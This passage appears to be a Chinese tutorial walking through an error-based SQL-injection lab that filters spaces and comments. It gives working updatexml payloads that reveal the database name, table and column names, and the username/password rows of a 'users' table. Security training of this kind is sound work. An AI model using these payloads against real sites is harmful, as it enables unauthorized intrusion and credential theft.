注意:该关的空格、注释也被屏蔽了。
1、判断闭合方式
输入语句
?id=1\
,返回页面如下:
我们发现返回的报错信息中在\号的后面跟着一个'号。这说明闭合方式是'。
2、爆破数据库名、用户名、版本
输入语句
?id=1' %26%26 updatexml(1,concat('~',database(),user(),version(),'~'),1) %26%26 '1'='1
,返回页面如下:
3、爆破数据表名
输入语句
?id=1' %26%26 updatexml(1,concat('~',(sElect (group_concat(table_name)) from (information_schema.tables) where (table_schema=database())),'~'),1) %26%26 '1'='1
,返回页面如下:
4、爆破字段名
输入语句
?id=1' %26%26 updatexml(1,concat('~',(sElect (group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) %26%26 (table_name='users')),'~'),1) %26%26 '1'='1
,返回页面如下:
5、爆破字段内容
输入语句
?id=1' %26%26 updatexml(1,concat('~',(sElect (group_concat(concat(id,'~',username,'~',password))) from (users)),'~'),1) %26%26 '1'='1
,返回页面如下:
我们发现显示的内容不完全,我们将语句改为:
?id=1' %26%26 updatexml(1,concat('~',mid((sElect (group_concat(concat(id,'~',username,'~',password))) from (users)),30,31),'~'),1) %26%26 '1'='1
,返回内容如下: